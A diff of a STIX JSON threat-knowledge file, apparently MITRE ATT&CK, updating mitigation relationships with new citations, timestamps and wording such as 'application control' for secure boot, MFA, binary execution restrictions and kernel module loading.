- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"description": "Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)",
"type": "relationship",
- "modified": "2019-12-19T18:49:30.382Z",
+ "modified": "2020-04-23T19:10:28.375Z",
"created": "2019-11-13T14:44:49.724Z"
},
{
@@ -155743,17 +157134,27 @@
"source_ref": "course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb",
"target_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada",
"relationship_type": "mitigates",
- "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)",
+ "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module) Move system's root of trust to hardware to prevent tampering with the SPI flash memory.(Citation: ESET LoJax Sept 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel Hardware-based Security Technologies)",
"id": "relationship--0ee07cbe-2ff1-4ea9-8a72-c83a67ce4bba",
"external_references": [
{
"url": "http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf",
"description": "Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.",
"source_name": "TCG Trusted Platform Module"
+ },
+ {
+ "source_name": "ESET LoJax Sept 2018",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf",
+ "description": "ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019."
+ },
+ {
+ "source_name": "Intel Hardware-based Security Technologies",
+ "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf",
+ "description": "Intel. (2013). Intel Hardware-based Security Technologies for Intelligent Retail Devices. Retrieved May 19, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-23T23:50:48.269Z",
+ "modified": "2020-05-19T21:22:38.135Z",
"created": "2019-12-19T19:43:34.924Z"
},
{
@@ -155767,7 +157168,7 @@
"description": "Patch the BIOS and EFI as necessary.",
"id": "relationship--3b883930-6ab6-40df-a652-956c2524f300",
"type": "relationship",
- "modified": "2020-03-23T23:50:48.272Z",
+ "modified": "2020-05-19T21:22:38.148Z",
"created": "2019-12-19T19:43:34.928Z"
},
{
@@ -155781,7 +157182,7 @@
"description": "Prevent adversary access to privileged accounts or access necessary to perform this technique.",
"id": "relationship--49f4c3d1-25a1-49e1-af9f-80a4c2eb4bf7",
"type": "relationship",
- "modified": "2020-03-23T23:50:48.292Z",
+ "modified": "2020-05-19T21:22:38.147Z",
"created": "2019-12-19T19:43:34.930Z"
},
{
@@ -155802,7 +157203,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T23:50:48.305Z",
+ "modified": "2020-05-19T21:22:38.162Z",
"created": "2019-12-19T19:43:34.931Z"
},
{
@@ -155855,7 +157256,7 @@
"relationship_type": "mitigates",
"id": "relationship--5d7f29b7-4b95-425b-bb2c-7c722d6ec1aa",
"type": "relationship",
- "modified": "2020-03-23T23:43:32.488Z",
+ "modified": "2020-05-07T22:32:05.513Z",
"created": "2019-12-19T21:05:38.391Z"
},
{
@@ -155875,13 +157276,13 @@
"source_name": "TCG Trusted Platform Module"
},
{
- "url": "https://technet.microsoft.com/en-us/windows/dn168167.aspx",
- "description": "Microsoft. (n.d.). Secure the Windows 8.1 boot process. Retrieved June 11, 2016.",
+ "url": "https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process",
+ "description": "Microsoft. (n.d.). Secure the Windows 10 boot process. Retrieved April 23, 2020.",
"source_name": "TechNet Secure Boot Process"
}
],
"type": "relationship",
- "modified": "2020-03-23T23:43:32.534Z",
+ "modified": "2020-05-07T22:32:05.515Z",
"created": "2019-12-19T21:05:38.409Z"
},
{
@@ -155895,7 +157296,7 @@
"description": "Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.",
"id": "relationship--99662840-c630-4858-8d44-331d0b31fbc1",
"type": "relationship",
- "modified": "2020-03-23T23:43:32.508Z",
+ "modified": "2020-05-07T22:32:05.506Z",
"created": "2019-12-19T21:05:38.415Z"
},
{
@@ -156633,7 +158034,7 @@
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"id": "relationship--8b4c2543-e2f1-4f7c-b687-d07e7a4c763c",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.063Z",
+ "modified": "2020-07-15T12:43:36.498Z",
"created": "2020-01-19T16:10:15.496Z"
},
{
@@ -156647,7 +158048,7 @@
"description": "Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.",
"id": "relationship--69f9daff-c253-4d99-94e6-cd2a7a9483dc",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.092Z",
+ "modified": "2020-07-15T12:43:36.501Z",
"created": "2020-01-19T16:10:15.530Z"
},
{
@@ -156661,7 +158062,7 @@
"description": "Use multi-factor authentication for user and privileged accounts.",
"id": "relationship--04f19ae7-931f-4798-a609-4b64aced1da3",
"type": "relationship",
- "modified": "2020-03-28T21:11:58.114Z",
+ "modified": "2020-07-15T12:43:36.520Z",
"created": "2020-01-19T16:10:15.541Z"
},
{
@@ -156688,7 +158089,7 @@
"description": "Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.",
"id": "relationship--53c22ca9-b02f-4a45-adc6-cf7763a2c6a9",
"type": "relationship",
- "modified": "2020-03-23T19:49:17.670Z",
+ "modified": "2020-05-04T19:18:36.540Z",
"created": "2020-01-19T16:54:28.868Z"
},
{
@@ -156702,7 +158103,7 @@
"description": "Use multi-factor authentication for user and privileged accounts.",
"id": "relationship--e65ad45a-4862-4455-8d3c-454eb78deaeb",
"type": "relationship",
- "modified": "2020-03-23T19:49:17.680Z",
+ "modified": "2020-05-04T19:18:36.561Z",
"created": "2020-01-19T16:54:28.882Z"
},
{
@@ -156835,60 +158236,6 @@
"modified": "2020-01-22T15:11:52.138Z",
"created": "2020-01-22T15:11:52.138Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "relationship_type": "mitigates",
- "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
- "id": "relationship--921949f3-388c-44ec-9abc-bdab7be52c7c",
- "type": "relationship",
- "modified": "2020-03-27T20:14:07.539Z",
- "created": "2020-01-22T20:18:17.081Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
- "target_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "relationship_type": "mitigates",
- "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.",
- "id": "relationship--d736cb05-a3ce-49c7-a561-0ba8796fd64b",
- "type": "relationship",
- "modified": "2020-01-22T20:26:58.238Z",
- "created": "2020-01-22T20:26:58.238Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "target_ref": "attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4",
- "relationship_type": "subtechnique-of",
- "id": "relationship--1c08080c-bbf4-4a8f-ae10-fb29682783cf",
- "type": "relationship",
- "modified": "2020-01-22T20:26:58.240Z",
- "created": "2020-01-22T20:26:58.240Z"
- },
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
- "target_ref": "attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c",
- "relationship_type": "revoked-by",
- "id": "relationship--c01e8c29-3d3c-42a6-bed4-68fe299bd320",
- "type": "relationship",
- "modified": "2020-01-22T20:28:29.862Z",
- "created": "2020-01-22T20:28:29.862Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -156897,10 +158244,10 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.",
"id": "relationship--9c7faf9b-c0ee-419f-b816-777edebd3a2a",
"type": "relationship",
- "modified": "2020-03-29T15:34:07.118Z",
+ "modified": "2020-06-20T22:31:42.235Z",
"created": "2020-01-23T18:07:00.774Z"
},
{
@@ -156911,10 +158258,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Consider using application control configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--e7f93370-0bfc-417c-8811-627ab39fafca",
"type": "relationship",
- "modified": "2020-03-29T17:19:19.674Z",
+ "modified": "2020-06-20T22:34:03.422Z",
"created": "2020-01-23T18:30:11.123Z"
},
{
@@ -156928,7 +158275,7 @@
"description": "CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation).",
"id": "relationship--fd38c0fc-72d8-4638-b6e7-1f6c5964ab5c",
"type": "relationship",
- "modified": "2020-03-29T17:19:19.690Z",
+ "modified": "2020-06-20T22:34:03.437Z",
"created": "2020-01-23T18:30:11.132Z"
},
{
@@ -156942,7 +158289,7 @@
"description": "Consider blocking download/transfer and execution of potentially uncommon file types known to be used in adversary campaigns, such as CHM files",
"id": "relationship--51c6ea7a-8978-4bd5-9cc1-7d80bb16e70b",
"type": "relationship",
- "modified": "2020-03-27T21:04:50.389Z",
+ "modified": "2020-06-20T22:32:24.753Z",
"created": "2020-01-23T18:56:39.109Z"
},
{
@@ -156953,10 +158300,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d",
"relationship_type": "mitigates",
- "description": "Consider using application whitelisting to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Consider using application control to prevent execution of hh.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--f4702ee6-c04f-4ccb-95f3-1b40cf6c69c8",
"type": "relationship",
- "modified": "2020-03-27T21:04:50.400Z",
+ "modified": "2020-06-20T22:32:24.757Z",
"created": "2020-01-23T18:56:39.133Z"
},
{
@@ -156967,10 +158314,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--21ce896b-e6b5-4075-8d97-6b59c269247c",
"type": "relationship",
- "modified": "2020-03-29T15:45:34.093Z",
+ "modified": "2020-06-20T22:34:46.656Z",
"created": "2020-01-23T19:09:49.092Z"
},
{
@@ -156984,7 +158331,7 @@
"description": "InstallUtil may not be necessary within a given environment.",
"id": "relationship--a6352ede-7afb-4be5-bba4-bd5c0a20bae6",
"type": "relationship",
- "modified": "2020-03-29T15:45:34.118Z",
+ "modified": "2020-06-20T22:34:46.678Z",
"created": "2020-01-23T19:09:49.097Z"
},
{
@@ -156995,10 +158342,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--1837a0e7-d8aa-4c96-8213-7d08ceb86390",
"type": "relationship",
- "modified": "2020-03-27T21:13:45.205Z",
+ "modified": "2020-06-20T22:35:27.822Z",
"created": "2020-01-23T19:32:49.903Z"
},
{
@@ -157012,7 +158359,7 @@
"description": "Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.",
"id": "relationship--98afbb05-d48e-4438-add6-df3ea9fb568c",
"type": "relationship",
- "modified": "2020-03-27T21:13:45.247Z",
+ "modified": "2020-06-20T22:35:27.839Z",
"created": "2020-01-23T19:32:49.905Z"
},
{
@@ -157026,7 +158373,7 @@
"description": "Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--2d712b2d-a9a6-4efd-b37e-1219768bdde7",
"type": "relationship",
- "modified": "2020-03-29T15:50:56.991Z",
+ "modified": "2020-06-20T22:36:37.501Z",
"created": "2020-01-23T19:42:16.784Z"
},
{
@@ -157040,7 +158387,7 @@
"description": "Regsvcs and Regasm may not be necessary within a given environment.",
"id": "relationship--ce47df8d-02dc-4380-90f8-282e009ef0fe",
"type": "relationship",
- "modified": "2020-03-29T15:50:56.993Z",
+ "modified": "2020-06-20T22:36:37.504Z",
"created": "2020-01-23T19:42:16.786Z"
},
{
@@ -157051,7 +158398,7 @@
"source_ref": "course-of-action--d2a24649-9694-4c97-9c62-ce7b270bf6a3",
"target_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab",
"relationship_type": "mitigates",
- "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass application control. (Citation: Secure Host Baseline EMET) Identify and block potentially malicious software executed through regsvr32 functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--b0da6a37-0a54-438f-abeb-7f1dcfebaa45",
"external_references": [
{
@@ -157091,7 +158438,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T15:56:13.290Z",
+ "modified": "2020-06-20T22:37:33.081Z",
"created": "2020-01-23T19:52:17.661Z"
},
{
@@ -157105,7 +158452,7 @@
"description": "Restrict storage and execution of Control Panel items to protected directories, such as C:\\Windows, rather than user directories.",
"id": "relationship--2db67ddf-b414-4dc7-87ab-0846a8bd1e8e",
"type": "relationship",
- "modified": "2020-03-29T16:11:43.677Z",
+ "modified": "2020-06-20T22:33:19.040Z",
"created": "2020-01-23T19:59:52.898Z"
},
{
@@ -157116,7 +158463,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious and unknown .cpl files by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Identify and block potentially malicious and unknown .cpl files by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--98d0fca0-b3e7-4f69-b5f3-527cdd4f48c9",
"external_references": [
{
@@ -157151,7 +158498,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T16:11:43.704Z",
+ "modified": "2020-06-20T22:33:19.063Z",
"created": "2020-01-23T19:59:52.901Z"
},
{
@@ -157291,7 +158638,7 @@
"description": "By default, only administrators are allowed to connect remotely using WMI; restrict other users that are allowed to connect, or disallow all users from connecting remotely to WMI.",
"id": "relationship--38a350e5-634c-4dcb-8f6c-0615cdb37864",
"type": "relationship",
- "modified": "2020-03-24T14:58:13.307Z",
+ "modified": "2020-05-05T12:02:45.820Z",
"created": "2020-01-24T14:07:56.461Z"
},
{
@@ -157312,7 +158659,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T14:58:13.326Z",
+ "modified": "2020-05-05T12:02:45.845Z",
"created": "2020-01-24T14:07:56.465Z"
},
{
@@ -157415,10 +158762,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--10ff21b9-5a01-4268-a1b5-3b55015f1847",
"relationship_type": "mitigates",
- "description": "Whitelist applications via known hashes.",
+ "description": "Allow applications via known hashes.",
"id": "relationship--ab27d3af-d454-4a4c-801b-ea9a6c0d4b47",
"type": "relationship",
- "modified": "2020-03-24T16:50:36.388Z",
+ "modified": "2020-06-20T20:11:42.523Z",
"created": "2020-01-24T14:21:52.950Z"
},
{
@@ -157519,7 +158866,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.185Z",
+ "modified": "2020-04-28T13:27:20.643Z",
"created": "2020-01-24T14:32:40.504Z"
},
{
@@ -157540,7 +158887,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.205Z",
+ "modified": "2020-04-28T13:27:20.646Z",
"created": "2020-01-24T14:32:40.508Z"
},
{
@@ -157551,7 +158898,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"relationship_type": "mitigates",
- "description": "Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries can replace accessibility features binaries with alternate binaries to execute this technique. Identify and block potentially malicious software executed through accessibility features functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--ccec5b80-e16a-4379-926f-08c1c821497a",
"external_references": [
{
@@ -157586,7 +158933,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T19:11:19.217Z",
+ "modified": "2020-06-20T20:11:42.530Z",
"created": "2020-01-24T14:32:40.526Z"
},
{
@@ -157626,7 +158973,7 @@
"description": "Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.",
"id": "relationship--f3b4fdd4-24fa-48ed-8ffb-f80ad651c797",
"type": "relationship",
- "modified": "2020-03-29T16:31:56.222Z",
+ "modified": "2020-06-20T22:38:14.276Z",
"created": "2020-01-24T14:43:54.309Z"
},
{
@@ -157637,7 +158984,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c",
"relationship_type": "mitigates",
- "description": "Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries install new AppCertDLL binaries to execute this technique. Identify and block potentially malicious software executed through AppCertDLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--db8a5d74-11f0-4773-aae8-43a0a6f85f61",
"external_references": [
{
@@ -157672,7 +159019,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:22:45.419Z",
+ "modified": "2020-06-20T20:11:42.513Z",
"created": "2020-01-24T14:47:41.986Z"
},
{
@@ -157723,7 +159070,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd",
"relationship_type": "mitigates",
- "description": "Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application whitelisting (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
+ "description": "Adversaries can install new AppInit DLLs binaries to execute this technique. Identify and block potentially malicious software executed through AppInit DLLs functionality by using application control (Citation: Beechey 2010) tools, like Windows Defender Application Control(Citation: Microsoft Windows Defender Application Control), AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
"id": "relationship--65fa218e-b442-41ca-8fed-bccdb5523656",
"external_references": [
{
@@ -157758,7 +159105,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:10.225Z",
+ "modified": "2020-06-20T20:11:42.528Z",
"created": "2020-01-24T14:52:25.777Z"
},
{
@@ -157837,7 +159184,7 @@
"description": "Changing UAC settings to \"Always Notify\" will give the user more visibility when UAC elevation is requested, however, this option will not be popular among users due to the constant UAC interruptions.",
"id": "relationship--5329d477-4378-4635-8da8-ed427d7863fc",
"type": "relationship",
- "modified": "2020-03-24T21:28:29.800Z",
+ "modified": "2020-05-04T19:05:30.421Z",
"created": "2020-01-24T14:56:24.415Z"
},
{
@@ -157851,7 +159198,7 @@
"description": "Microsoft released an optional patch update - KB3045645 - that will remove the \"auto-elevate\" flag within the sdbinst.exe. This will prevent use of application shimming to bypass UAC.",
"id": "relationship--e9fd0f73-917d-4d53-9843-a1314720942f",
"type": "relationship",
- "modified": "2020-03-24T21:28:29.803Z",
+ "modified": "2020-05-04T19:05:30.437Z",
"created": "2020-01-24T14:56:24.423Z"
},
{
@@ -157891,7 +159238,7 @@
"description": "Odbcconf.exe may not be necessary within a given environment.",
"id": "relationship--5a72e713-c8fb-4438-9a08-0ded824381dd",
"type": "relationship",
- "modified": "2020-03-29T17:01:32.962Z",
+ "modified": "2020-06-20T22:39:00.818Z",
"created": "2020-01-24T15:01:33.185Z"
},
{
@@ -157902,10 +159249,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071",
"relationship_type": "mitigates",
- "description": "Use application whitelisting configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Use application control configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--8541e1a0-0cd5-44fc-bc88-c96b474bcaeb",
"type": "relationship",
- "modified": "2020-03-29T17:01:32.969Z",
+ "modified": "2020-06-20T22:39:00.823Z",
"created": "2020-01-24T15:01:33.187Z"
},
{
@@ -158131,7 +159478,7 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
"relationship_type": "mitigates",
- "description": "Identify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.",
+ "description": "Identify and block potentially malicious software that may be executed through the Winlogon helper process by using application control (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.",
"id": "relationship--796ea220-2948-461b-9948-4290eec8dbf6",
"external_references": [
{
@@ -158151,7 +159498,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:17:22.636Z",
+ "modified": "2020-06-20T20:11:42.508Z",
"created": "2020-01-24T17:00:00.069Z"
},
{
@@ -158165,7 +159512,7 @@
"description": "Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.",
"id": "relationship--bfce35b9-7ae9-4194-83a7-5e5ff1481551",
"type": "relationship",
- "modified": "2020-03-25T16:17:22.650Z",
+ "modified": "2020-04-21T16:00:41.469Z",
"created": "2020-01-24T17:00:00.072Z"
},
{
@@ -158254,17 +159601,42 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6",
"relationship_type": "mitigates",
- "description": "Application whitelisting and software restriction tools, such as SELinux, can also aide in restricting kernel module loading. (Citation: Kernel.org Restrict Kernel Module)",
+ "description": "Application control and software restriction tools, such as SELinux, KSPP, grsecurity MODHARDEN, and Linux kernel tuning can aid in restricting kernel module loading.(Citation: Kernel.org Restrict Kernel Module)(Citation: Wikibooks Grsecurity)(Citation: Kernel Self Protection Project)(Citation: Increasing Linux kernel integrity)(Citation: LKM loading kernel restrictions) Since macOS High Sierra 10.13, Secure Kernel Extension Loading (SKEL) can also be used to restrict the loading of kernel modules.(Citation: Apple TN2459 Kernel Extensions)",
"id": "relationship--b783f90e-bd7c-4513-b15a-731637d7078d",
"external_references": [
{
"url": "https://patchwork.kernel.org/patch/8754821/",
"description": "Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loadinglogin register. Retrieved April 9, 2018.",
"source_name": "Kernel.org Restrict Kernel Module"
+ },
+ {
+ "source_name": "Wikibooks Grsecurity",
+ "url": "https://en.wikibooks.org/wiki/Grsecurity/The_RBAC_System",
+ "description": "Wikibooks. (2018, August 19). Grsecurity/The RBAC System. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Kernel Self Protection Project",
+ "url": "https://www.kernel.org/doc/html/latest/security/self-protection.html",
+ "description": "Kernel.org. (2020, February 6). Kernel Self-Protection. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Increasing Linux kernel integrity",
+ "url": "https://linux-audit.com/increase-kernel-integrity-with-disabled-linux-kernel-modules-loading/",
+ "description": "Boelen, M. (2015, October 7). Increase kernel integrity with disabled Linux kernel modules loading. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "LKM loading kernel restrictions",
+ "url": "https://xorl.wordpress.com/2018/02/17/lkm-loading-kernel-restrictions/",
+ "description": "Pingios, A.. (2018, February 7). LKM loading kernel restrictions. Retrieved June 4, 2020."
+ },
+ {
+ "source_name": "Apple TN2459 Kernel Extensions",
+ "url": "https://developer.apple.com/library/archive/technotes/tn2459/_index.html",
+ "description": "Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020."
}
],
"type": "relationship",
